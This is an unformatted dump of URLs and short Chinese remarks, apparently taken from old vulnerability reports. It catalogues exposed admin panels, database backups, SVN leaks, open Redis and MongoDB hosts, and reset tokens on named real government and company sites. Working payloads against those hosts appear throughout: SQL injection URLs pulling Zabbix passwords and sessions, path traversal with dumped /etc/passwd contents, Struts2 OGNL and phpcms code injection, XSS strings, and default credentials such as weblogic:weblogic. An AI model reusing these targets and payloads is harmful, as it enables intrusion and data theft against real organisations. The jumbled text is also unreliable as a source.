http://0.mp3正确的地址发现界面正常 http://0.mp3\之后 http://zwzx.wuchang.gov.cn/new/web/blzn/bszn_spiteminfo.jsp?spitemid=42010600GS-XK-0021-002 http://www.zcasc.gov.cn/application/wsbs/bszn/qysrgbdb_spiteminfo.jsp?spitemid=20130703102813875056 http://zwzx.gzwuchuan.gov.cn/application/ztxz/xzjj.jsp?type=81&departid=4 http://www.cyxzfw.gov.cn/application/zwgk/xzzhinanxiang.jsp?dhbt=%CD%F8%C9%CF%B0%EC%CA%C2&ZJJGDM=726108715&depName=%B3%A4%D1%F4%CF%D8%B9%AB%B0%B2%BE%D6%CF%FB%B7%C0%B4%F3%B6%D3长阳土家族自治县政务服务中心 http://www.kyasc.cn/application/wsbs/bszn/xzzhinanxiang.jsp?ZJJGDM=16971551&depName=%B8%DF%D5%AF%B4%FA%C0%ED贵州省开阳政务网 http://www.xnxzfwzx.gov.cn http://www.xnxzfwzx.gov.cn/application/hdzl/bgxz/formdowm.jsp?SPITEMID=421201011337629027&depName=%E6%B0%B4%E5%8A%A1%E5%B1?&zzjgdm=011337629 http://blog.douguo.com/ http://blog.douguo.com/wp-admin/ http://bbs.my399.com/config/config_ucenter.php.bak line:103 http://www.foundertype.com/admin/FCKeditor/editor/filemanager/upload/test.html http://www.czjs.gov.cn http://www.czjs.gov.cn/egov/was/web/jsbsdt/common.jsp?url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B http://www.lanrentuku.com/js/search/q= http://218.249.66.220/evaluation/WebRoot/Login/login.php http://www.blued.cn/FindPassword http://qfoa.qfkd.com.cn/ http://www.fenby.com/ site:ubn.cn inurl:P_detail.php?nodeID= http://www.w55929.ubn.cn/main/P_detail.php?nodeID=102836 inurl:P_detail.php?nodeID= inurl:shop.php?idDept= http://e.meituan.com/shop/ http://www.ajzw.gov.cn/ http://club.suning.com site:club.suning.com inurl:profile https://passport.suning.com/ids/login ztadmin.house365.com/admin.php http://wooyun.org/bugs/wooyun-2013-044050 http://wooyun.org/bugs/wooyun-2013-031912 http://wooyun.org/bugs/wooyun-2013-044050 http://follow.chinacache.com http://follow.chinacache.com/verify.php?id=111&confirm_hash=75c29fb65********* site:bbs.gome.com.cn inurl:profile http://home.inc.hc360.com/homenew/Home/View.asp http://www.hn.189.cn/hnselfservice/orderinfoservice/shop-order!showOrderListForCart.action?numValue=430403197711081103 http://hn.189.cn/hnselfservice/orderinfoservice/shop-order!showOrderListForCart.action?numValue=43020419820202205X site:189.cn http://image.bitautoimg.com/UploadPic/2013/12/22/20131222071206.php http://sb.zjinfo.gov.cn/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.qyslyj.gov.cn/Foosun/Admin/Login.asp http://www.qyslyj.gov.cn/FooSun_Data/FooSun_Data.mdb http://smtp.cntv.cn/cntv.zip http://pop.mail.cntv.cn/cntv.zip http://vip.cntv.cn/ site:xywy.com inurl:php http://www.ahhr.com.cn/Detail.aspx?id=82120 ext:as协议引起的http- ext:as:navi_online_index-479*1248-U90888:file:///mnt/sdcard/payload.html ext:uc_dw可以无提示地下载任意类型的文件,而且request是带着相应cookie的,并保存在固定目录,下载文件名也是可预测的。所以思路就是使用ext:uc_dw把想要读取的内容下载到本地,然后再读取本地文件(file域读取file域没有限制)。 http://eclub.chinacache.com/reg/index.aspx注册未过滤导致注入 http://post.tom.com/ http://sfocs.sf-express.com:8080/ http://www.mtvchina.com http://www.mtvchina.com:80/.bash_history mtvchina.com/www/db_2******8.sql mtvchina.com/www/db_2******8.sql mtvchina.com/www/db_2******8.sql mtvchina.com/www/db_2******8_utf8.sql mtvchina.com/www/db_2******8_utf8.sql http://rds.blog.alibaba-inc.com/ site:alibaba-inc.com http://rds.blog.alibaba-inc.com http://rds.blog.alibaba-inc.com/ http://eclub.chinacache.com/reg/getpwd.aspx http://eclub.chinacache.com/reg/index.aspx http://webi.tom.com/include/ http://www.oschina.net/code/download_src?file=../../../../../etc/passwd http://cs.now.cn/nowcn/ http://shop4.now.cn/admin http://cs.tnet.hk/dede/ http://cs.eranet.com/dede/ http://admin.3595.com/Login.Aspx http://post.news.tom.com/post.tar.gz http://post.tom.com/post.tar.gz http://post.weiqi.tom.com/post.tar.gz http://post.auto.tom.com/post.tar.gz http://post.she.tom.com/post.tar.gz http://www.zhihu.com/question/22337798/answer/21056338 http://www.sxdachang.com/admin/ host:zhandian.cctv.com http://zhandian.cctv.com/ http://doctor.zjwst.gov.cn/20120913/Village_Doctor/DownData/ http://dns.zjwst.gov.cn/DownData/ http://netcenter.cau.edu.cn/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig http://photo.weibo.com/users/follow http://photo.weibo.com/users/follow http://119.254.84.155/ http://119.254.84.155/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://119.254.84.155/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://url/pertool_subsite/skins/压缩包内shell地址 http://10.11.5.201:9080/jis/front/sso.jsp?uri=loginuser=2011080332531 http://www.bypay.cn/ http://passport.eastmoney.com/FindPwd.EmUser http://119.254.82.134 http://119.254.82.134/.bash_history http://114.247.88.17 http://114.247.88.17/wiki/images/ http://www.qianwango.com/data.rar http://www.qianwango.com/kdjj_hdak_wiuhsdbd_sou.mdb http://www.qianwango.com/iis.aspx比较坚挺,尝试了admin的原始口令就pass了 http://wap.iask.com/etc/hosts http://wap.iask.com/etc/passwd http://119.6.92.54/security/ http://12582.10086.cn/Activity/DialLottery/HappyKnockEgg/1499613 http://www.rest.com.cn/NewsDetails.aspx?SWQ9MTQw URL:http://100inn.cc/NewsDetail.aspx?newid=140 http://ued.focus.cn http://www.inca.com.cn/ http://ls.qayy.com:7088/sws/login.action http://218.92.21.179:3333/gys/login.action http://www.angelcrunch.com:80/ www.angelcrunch.com http://119.6.92.60/ http://119.6.92.60/database/ http://119.6.92.60/bin/ http://119.6.92.45/ http://119.6.92.45/module/ http://119.6.92.45/upload/ www.hbzljd.gov.cn/jsp/zwgk/browser/content.jsp?id=727存在注入点 http://new.100inn.cc/目录遍历 http://www.glj.hbjt.gov.cn/jsp/jzxx/browser/View.jsp?id=235存在注入点 http://www.sqk.com.cn:8008/ http://www1.ahedu.gov.cn/gxbys/show.asp?id=183 http://uplive.bypay.cn/manager!managerLogOut.ac http://channel.3g.youku.com/ykmks/index.jsp http://124.115.22.130/ http://www.yurun.com/yurun_behind/htmledit/upload.asp http://wooyun.org/bugs/wooyun-2010-041330 http://59.46.220.76/common/.svn/text-base/page_macro.ftl.svn-base http://www.hbnz.gov.cn/UploadFace.asp http://www.hbnz.gov.cn/bottom.asp http://www.hbnz.gov.cn/editor/upload.asp http://www.hbnz.gov.cn/login.asp http://www.hbnz.gov.cn/upme1.htm http://www.hbnz.gov.cn/Pic.asp http://10.11.5.201:9080/jis/front/upduser_do.jsp http://blog.umeng.com/ http://angelcrunch.com/settings/profile https://it.qdone.com.cn/console/index!login.action https://y.qdone.com.cn/mmp/login.action https://paymoney.qdone.com.cn/HuiFK/login.action http://jiaofei.qdone.com.cn/payment/login.action http://mer.qdone.net.cn/hfk/login.action http://h.qdone.net.cn/console/merchantLogin!merchantLogin.action https://ecitic.qdone.com.cn/hfk/login.action http://market.qdone.net.cn/market/login.action https://it.qdone.com.cn/console/index!login.action https://y.qdone.com.cn/mmp/login.action https://paymoney.qdone.com.cn/HuiFK/login.action http://jiaofei.qdone.com.cn/payment/login.action http://mer.qdone.net.cn/hfk/login.action http://mer.qdone.net.cn/hfk/login.action http://h.qdone.net.cn/console/merchantLogin!merchantLogin.action https://ecitic.qdone.com.cn/hfk/login.action http://market.qdone.net.cn/market/login.action http://portal.zfsoft.com:8799/khxt/userLogin.action http://124.205.51.138 http://bbs.freshpower.cn http://221.176.8.37:8080/indexPage.action http://www.dodopal.com/bangzhuzhongxin/wodezhanghu/zhuceyujihuo/2011-03-15/585.php https://application.dodopal.com:9998/fapayf/chargeCard.action https://cq.hzt360.com/distribution/distribution https://58.56.23.89:9443/paygate/paygate.action http://xss.tw/999 http://bbs.pcgames.com.cn/topic-2805469.html http://12580.10086.cn/member/find_password_input.jsp http://www.sjgj.cn/mainAction.action http://go.zzz4.com/User_Show.asp?id=15 http://118.194.32.61/FCKeditor/editor/fckeditor.html http://egov.guang-an.gov.cn/egh/ http://egov.guang-an.gov.cn/egh/FileUploads/ http://egov.guang-an.gov.cn/egh/UserKeepFileUploads/ http://ha.189.cn/ http://58.83.206.67 http://58.83.206.67/orderAccountAction/orderAccountPage.action http://supp.jd.com/suppliersystem/ http://***/install/install.php http://shop322763.p13.shopex.cn/ http://www.zjgwater.gov.cn/newsview.asp?id=2202&BigClassName=%B8%DB%B3%C7%CB%AE%C0%FB&title=%CC%C1%C7%C5%D5%F2%D6%F7%D2%AA%C1%EC%B5%BC%CA%D3%B2%EC%B6%AC%B4%BA%CB%AE%C0%FB www.xadaj.gov.cn/jsp/galleria/eweb/show.jsp?id=17718 moa.scal.com.cn/qq.asp moa.scal.com.cn/test/2.asp http://ess.lenovomobile.com http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8410 http://ess.lenovomobile.com/regiStep4.aspx?MbrID=8409 http://xyschool.xyedu.gov.cn/ http://www.ycwater.gov.cn/news_show.asp?id=9760&wz=%D0%C2%CE%C5%D6%D0%D0%C4 http://58.213.154.146:8488/GYS/login.action‎ http://agentcrm.inc.hc360.com/ http://m.dangdang.com/sms.php?k=f198a79b9cF http://rd.kuaijianli.com/ http://rd.kuaijianli.com/?a=get_manager&job_type=&have_internship_job=-1&end_id=0&_=1387958284657 http://custom.haiziwang.com/tuangou/detail.htm?id=1713b7d20afe49d19932c9be6f78b0ea http://job.abchina.com/prs/testCardEdit.do?action=loadTestCard&jobapplid=46119158 http://job.abchina.com/prs/testCardEdit.do?action=loadTestCard&jobapplid=46119160 http://zixun.110.com/5e27fa9f1e017d329261a023f2400ce1/login.php http://www.ftkenglish.com/index.php?controller=active&action=index&m=/../../../../../../../../../../../../etc/passwd%00.html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin http:x:501:501::/home/http:/sbin/nologin phper:x:501:501::/var/www:/bin/bash zabbix:x:503:503::/home/zabbix:/sbin/nologin http://125.88.123.189/ http://118.194.34.122/manage/login http://www.wxps.gov.cn/System/Login.aspx http://usermz.5see.com/,登录,我的注册号:xix11111 http://usermz.5see.com/guestbook/q981358 http://www.jxfc.gov.cn http://www.jxfc.gov.cn/cms/admin/login.action http://www.wbus.cn/ http://125.69.85.51:8088 http://www.saymamu.com/flow.php http://www.isite.kometo.com//install/install.php http://www.digitalchina.com.hk/c/product_details.php?id=8084 http://www.grandfortunebayhotel.com/BGR$admin/index.asp http://www.webluker.com/webtools/snmp http://www.wooyun.com/a.php?hacking=$hack http://demo.xiaomayi.co/public/ajax.aspx?action=showmoodshop&id=1416&mode=update&StringValue=4Sl7d3fY&_=1387864247768 demo.xiaomayi.co/public/ajax.aspx?action=showmoodshop&id=1416&mode=update&StringValue=4Sl7d3fY&_=1387864247768 http://hudong.moc.gov.cn:2517/admin/ RUL:http://hudong.moc.gov.cn:2517/opinion/display/ http://hudong.moc.gov.cn:2517/opinion/display/images/CL-03.jpg http://hudong.moc.gov.cn:2517/admin/ http://design.gbicom.cn inurl:help/HelpAdd.aspx http://www.xxx.com/help/HelpAdd.aspx http://www.sxdachang.com/data_base/qiye_data@@.mdb mongodb://220.181.90.188:10000 http://www.wdds.com.cn/wdbh/web/member/getCardInfo.do http://171.34.69.197/license!getExpireDateOfDays.action http://www.qz10085.com/zxb.html file://本地文件域),解析执行其中的代码。 http://www.cdsmes.com/wzpt/qdzxfw/zxfwinit.do inurl:/module/jslib/jquery/jpage/dataproxy.jsp http://www.bjmu.edu.cn/module/jslib/jquery/jpage/dataproxy.jsp?startrecord=1&endrecord=100&perpage=100&appid=1&webid=1&path=%2F&columnid=4866&unitid=117&webname=%E5%8C%97%E4%BA%AC%E5%A4%A7%E5%AD%A6%E5%8C%BB%E5%AD%A6%E9%83%A8 http://www.sqsc.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?startrecord=1&endrecord=15&perpage=15&col=1&appid=1&webid=1&path=/&columnid=19&unitid=325*&webname= http://www.sqsc.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?startrecord=1&endrecord=40&perpage=40&col=1&appid=1&webid=1&path=/&columnid=19&unitid=325&webname= http://www.ntwater.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?endrecord=60&perpage=20&startrecord=1 http://app.info.hc360.com/ Destinaction:http://app.info.hc360.com/iistest.asp http://www.chuangyiren.cn http://218.106.133.55/Login.aspx?userRequest=http%3a%2f%2f218.106.133.55%2fdefault.aspx Destination:http://218.106.133.55/iistest.asp http://www.weixintuo.com/wxt/home/LoadHome.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://www.jngt.gov.cn/jngt/login.action http://125.88.6.155/coms/login.jsp http://125.88.6.156/coms_wh/login.jsp http://www.czsie.com.cn/ http://125.88.6.155/coms/login.jsp http://125.88.6.156/coms_wh/login.jsp http://125.88.6.155/coms/ http://125.88.6.156/coms_wh/ http://www.tclbusiness.com//phpsso_server/?m=admin&c=index&a=init&forward= http://200.200.87.150:911/member.php?app=2&member=&action=43 http://u.china.com/photo/?_a=editalbum&albumid=22615 http://s.anjuke.com/config.php http://121.14.129.111/ http://survey.sohu.com/list.php http://footprint.cws.api.sina.com.cn/del.php?pid=1&uid=[UID参数]&deleteuid=[被来黑的UID参数]&inblack=1&varname=requestId_71119117 http://bbs.baofeng.com/tools.php https://gzgjj.gov.cn/wsywgr/LoginAction!login.action http://data.2010.sohu.com/player/ajax/player_list.ajax.php?team_id=201 android:exported的值,其android:exported取的是默认的值:true,导致任意第三方App都可以调用此接口,读取浏览器中的任意私有文件信息。 http://lashou.com/account/reset?code=MTg2***5Mjg0MDR8bml***wNjIzfDU0MzAwNTc5MkBxcS***18MTM4ODEwNzg3NnxkNTdhOG****MzYyZjI4MzVmMTE4MWYx***yMDc0Yw%3D%3D http://lashou.com/account/resetreq http://www.xyfdc.gov.cn/htmlaspx/fydj/qg_issue.aspx?code=797767 http://u.china.com/account/find.php?_a=search_more&city_id=810100 http://u.china.com/account/find.php?_a=search_more&username=%27&usermail= http://www.51maipiao.cn/ http://www.ecbs.cn/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://hdwx.114chn.com/sm/Default.aspx http://srm.tclking.com/ http://59.33.249.38/vmi/WebService/WS_Login.asmx/Login www.now.cn/pay/outport.net http://en.ployer.cn/mid_detail.php?id=13 http://cofcomag.cofco.com/cn/periodical/old.aspx http://cofcomag.cofco.com/cn/periodical/old.aspx http://cofcomag.cofco.com/cn/periodical/old.aspx http://bgy.ata.net.cn:7943/CUST01reg/Report/ExamRegisterReportInfo.aspx?ID=00223&RandomSet=0.8303370408577311 http://bgy.ata.net.cn:7943/CUST01reg/Report/C_WebImage.aspx?id=700019 http://bgy.ata.net.cn:7943/CUST01reg/Report/C_WebImage.aspx?id=841126 http://vt.shengdian.eol.cn/2012/itemlist.php?itemid=6 http://blog.39.net/admin/photosload.aspx http://q601333.duapp.com/ redis:220.181.11.182:6379 redis:220.181.11.183:6379 redis:220.181.11.184:6379 redis:220.181.11.185:6379 redis:220.181.11.54:6379 redis:220.181.118.144:6379 redis:220.181.118.182:6379 redis:220.181.118.183:6379 redis:220.181.118.59:6379 redis:220.181.118.73:6379 redis:220.181.19.11:6379 redis:220.181.19.139:6379 redis:220.181.19.152:6379 redis:220.181.2.172:6379 redis:220.181.2.173:6379 redis:220.181.2.174:6379 redis:220.181.2.64:6379 redis:220.181.89.41:6379 redis:220.181.89.52:6379 redis:220.181.89.63:6379 redis:220.181.61.193:6379 redis:220.181.69.127:6379 www.xcslw.com/User/detail.aspx?order_id=order_id编号 http://claims.lenovo.com http://claims.lenovo.com/Claim/PrintPartInformation.aspx?ClaimId=9990540964&PartNumber=45N7321&Notes http://wooyun.org/bugs/wooyun-2010-041564 http://passport2.pcauto.com.cn/passport2/api/activate.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D88B03B2BB4DBCCA807DADED7EBBDDA38E3E4856A85E254A28-31269713&url=http%3A%2F%2Fmy.pcauto.com.cn%2Fpassport%2Factivate_done.jsp http://my.pconline.com.cn/passport/reset_password.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D8252F925C0FD13AEE-31269713 http://multimedia.tcl.com/administrator/ http://tcm.iquanyou.com.cn/tcm/userLogin.action http://hudong.moc.gov.cn:2517/opinion http://jtsjy.moc.gov.cn:88/indexAction.do http://hudong.moc.gov.cn:2517/opinion/display/fillForm.jsp?topicID=118 http://www.cjnh.gov.cn/ http://www.cjnh.gov.cn:6666/status?full=true http://zzmetro.cn/ http://zzmetro.cn/adminindex.jsp http://zzmetro.cn/jsptest.jsp http://2012b2c.juneyaoair.com/ http://2012b2c.juneyaoair.com/crmInterLogin.do http://2012b2c.juneyaoair.com/resetPwd.do http://www.fyair.com http://www.yite.com/custom.php?cid=3 http://www.yite.com/sinfo.php?id=94 http://www.yite.com/info.php?id=4 http://www.yite.com/my_news_info.php?id=93 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://hot.yn.189.cn/vote/view/index.jsp http://hot.yn.189.cn/test1/ http://125.65.165.8:7001 http://219.153.32.161/ http://cms.yegame.com/wap.php http://cms.yegame.com/yegame_master/login.php http://59.151.39.183/eee http://kefu.linekong.com/web-console http://tools.linekong.com:8080/ http://59.151.49.39:7080/web-console http://59.151.49.36/web-console/ http://218.106.133.58/ehr http://www.12306.cn/otn/confirmPassenger/getPassengerDTOs http://218.106.133.143/sigma/chkmess.asp?messid=52 http://218.106.133.149/Default.aspx http://www.ttkdex.com/houtai/adminlogin.jsp http://www.ttkdex.com/ChatRoom/forum/main.jsp http://mail.ttkd.cn/ http://cts.tcl.com http://cts.tcl.com/AjaxHelper/AjaxHelper.aspx?method=login&PassWord=e&UserName=e www.tclbusiness.com http://0day5.com/archives/933 www.tclbusiness.com http://weather.hsw.cn/aiqiang/index.php?a=add&fid=1贴个字条 http://jifen.360.cn/index/lotteryrich.html http://www.cyty.cn/yongzhuangshengdian/tuji.php?id=14 http://www.cyty.cn/yongzhuangshengdian/tuji.php?id=14 http://www.gzrailway.com.cn/ http://www.jntlj.com/cx_more.aspx?type=zgyy http://www.jntlj.com/cx_nr.aspx?type=JTXW&id=6653 http://zhangheng.v2.taodiantong.cn http://202.109.187.112/license!getExpireDateOfDays.action http://tech.tcl.com/cmd.asp http://zhangheng.v2.taodiantong.cn http://zhangheng.v2.taodiantong.cn注册一个账号111111@111.com http://218.106.133.55 http://218.106.133.54 http://218.106.133.54/console weblogic:weblogic直接进入。 http://localhost:81/startbbs/index.php/admin/users/edit/4 http://218.106.133.143 http://218.106.133.143/sigma/download.asp?freq=126&id=1 http://house.china.com.cn/ASPX/Photo/HousePhotoList.aspx?PhotoID=724652 http://api.xianguo.com/i/views/version.json?key=36d979af3f6cecd87b89720d3284d420&udid=860755000000000&version=64&devicetype=5 http://lhb.265g.com/2013/ http://lhb.265g.com/2013/g3513.html http://fahao.265g.com/181157.html gov.user/index.php http://s.etao.com/search?q=%22%3e%3ca+href%3D%22x%22%3e%3cimg+src%3Dx+onerror%3Dalert%28%2Fx%2F%29%3e%2F&initiative_id=setao_20131229&style=grid&qservice=s1&page_tab=haiwai&tbpm=20131229 http://s.etao.com/search?q= http://www.cnblogs.com/haibindev/archive/2011/10/17/2214518.html http://pdscore.pconline.com.cn/.svn/text-base/uppPriceList.jsp.svn-base http://pdscore.pconline.com.cn/.svn/text-base/index.htm.svn-base http://pdscore.pconline.com.cn/.svn/text-base/logon.jsp.svn-base http://pdscore.pconline.com.cn/.svn/entries http://pdscore.pconline.com.cn/CVS/Root http://pdscore.pconline.com.cn/.svn/entries http://sports.163.com/13/1224/08/9GRLN4QJ00051C8U.html kf2.coolpad.cn/upload.php http://59.46.220.76/components/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp http://www.syneuedu.com/page.action?mark=Skillbase&mid=77&pid=61 http://www.langlib.com:28017/ http://125.89.68.104/report/front/main/showAll.action http://yzc.ccwsj.gov.cn:8080/medicine/login.action http://www.fqw8.com/web.rar http://i.s1979.com/home.php?mod=space&uid=2&do=profile获得uid为2的管理员用户名qinrl; http://59.61.88.234:8080/ http://weibo.com/u/3022690473欢迎收听我的微博!# http://bbs.g.1ting.com/uc_server/admin.php http://www.jckc.gov.cn/zxft.php?classid=20&id1=%20classid=20 http://www.jckc.gov.cn/sqmy04.php?classid=184 http://jckc.gov.cn/dzcs/show.php?id=10也存在注入: http://60.28.193.157:9080/login.jsp?url=%2Findex.jsp http://59.151.89.7:8084/.svn/entries http://59.151.89.7:8084/pay_lashou/.svn/entries http://59.151.89.7:8084/crmlashou/.svn/entries http://59.151.89.7:8084/client_lashou/.svn/entries svn://10.168.31.52/pay_lashou/crmlashou svn://10.168.31.52/pay_lashou svn://10.168.31.52/pay_lashou/pay_lashou svn://10.168.31.52/pay_lashou http://59.151.89.7:8084/pay_lashou/index.php?c=login& http://59.151.89.7:8084/crmlashou/index.php?c=login& http://59.151.89.7:8084/client_lashou/index.php?c=login& http://home.4games.com/ http://lccb.guet.edu.cn/upload5x/ http://lccb.guet.edu.cn/zecmd/ http://124.127.255.63/ http://www.fumu.com/api/js.php?tagname=[2012]通用美图热赏&piccatid=11101 http://www.scrftb.gov.cn/ http://www.scrftb.gov.cn/SearchList.aspx?s=a cs:108 http://115.182.51.86,使用了开源程序phpcms2007 http://115.182.51.86/movie/onunload.php?serverid=1 http://www.ygshangjie.com http://www.ygshangjie.com/plus/mytag_js.php?aid=9090 http://www.eboss.cn/ http://www.eboss.cn/weichen.txt http://yingshi-v2.114la.com/?ac=enjoy_detail&id=3 http://220.181.154.216:8080/ http://app.114la.com/jidanci/?ac=jiyi_json&cikuid=7&startid=5&pre=0 http://selfservice.ikuai8.com/漏洞在这个站点,本意是上网用户登陆页面的云端设置,却造成了一个存储型XSS的诞生 http://report.lenovo.net/Login.aspx http://report.lenovo.net/FindPassword.aspx http://hscms.net/ http://www.Sxtm.com http://www.snfox.com/ http://www.zjcz.net.cn/ www.wenmingwangzhan.cn http://office.yyedu.gov.cn/login.action?backURL=http%3A%2F%2Foffice.yyedu.gov.cn%2Findex.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin winupon:x:500:500::/home/winupon:/bin/bash http://218.14.88.21/ http://crmreport.tv.tcl.com/WebReport/ReportServer?op=resource&resource=/etc/passwd http://218.14.88.20/DRP/login.action http://218.14.88.13/DRP/login.action http://www.digitalchina.com.hk/c/ir_results.php?year=2013 http://www.digitalchina.com.hk/c/ir_bod_details.php?id=176477 http://www.digitalchina.com.hk/c/product_details.php?id=8401 http://ac.ip126.com/ http://ac.ip126.com/data/%23ttgq.asp http://e.edayshop.com/xt/ys/EDSC006/admins/index.asp http://e.edayshop.com/xt/ys/EDSC006/admins/upload_flash.asp?formname=bd&editname=tp&uppath=../tp&filelx=jpg http://www.jeanswest.com.cn和http://www1.jeanswest.com.cn貌似是一样的 http://www1.jeanswest.com.cn/glorious/advjob/job_view.asp?id=112 ftp://211.144.213.114 http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday: http://taobao.fumu.com/flash_upload.php?modelid=1 http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday: http://taobao.fumu.com/comment/comment.php?action=vote http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday: http://taobao.fumu.com/yp/business/index.php?file=../../admin/block&action=post&blockid=eval&template=%3C?php%20phpinfo%28%29;exit%28%29;?%3E http://pscm.lenovo.com.cn http://pscm.lenovo.com.cn/defaultframe.htm?r=/logistics/quality/ntf/ntftestquery/default.htm&user=C17913 http://ss.thinkworld.com.cn http://www.feiren.com/ http://ffp.airchina.com.cn/cn/member/EmailStatement.jsp?mid=001183834512&beginMonth=20130101&endMonth=20131129 url:http://www.shengyuan.com/index.php/web_api/articleHDList/0 http://ffp.juneyaoair.com/ http://ffp.juneyaoair.com/ http://mall.juneyaoair.com/ http://www.juneyaoair.com/ http://60.28.196.107 test:test http://222.186.64.169/yzhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=ebf6565f-3fd8-4586-b413-4bbf2667e7b6&ClientType=13&ModuleType=8102 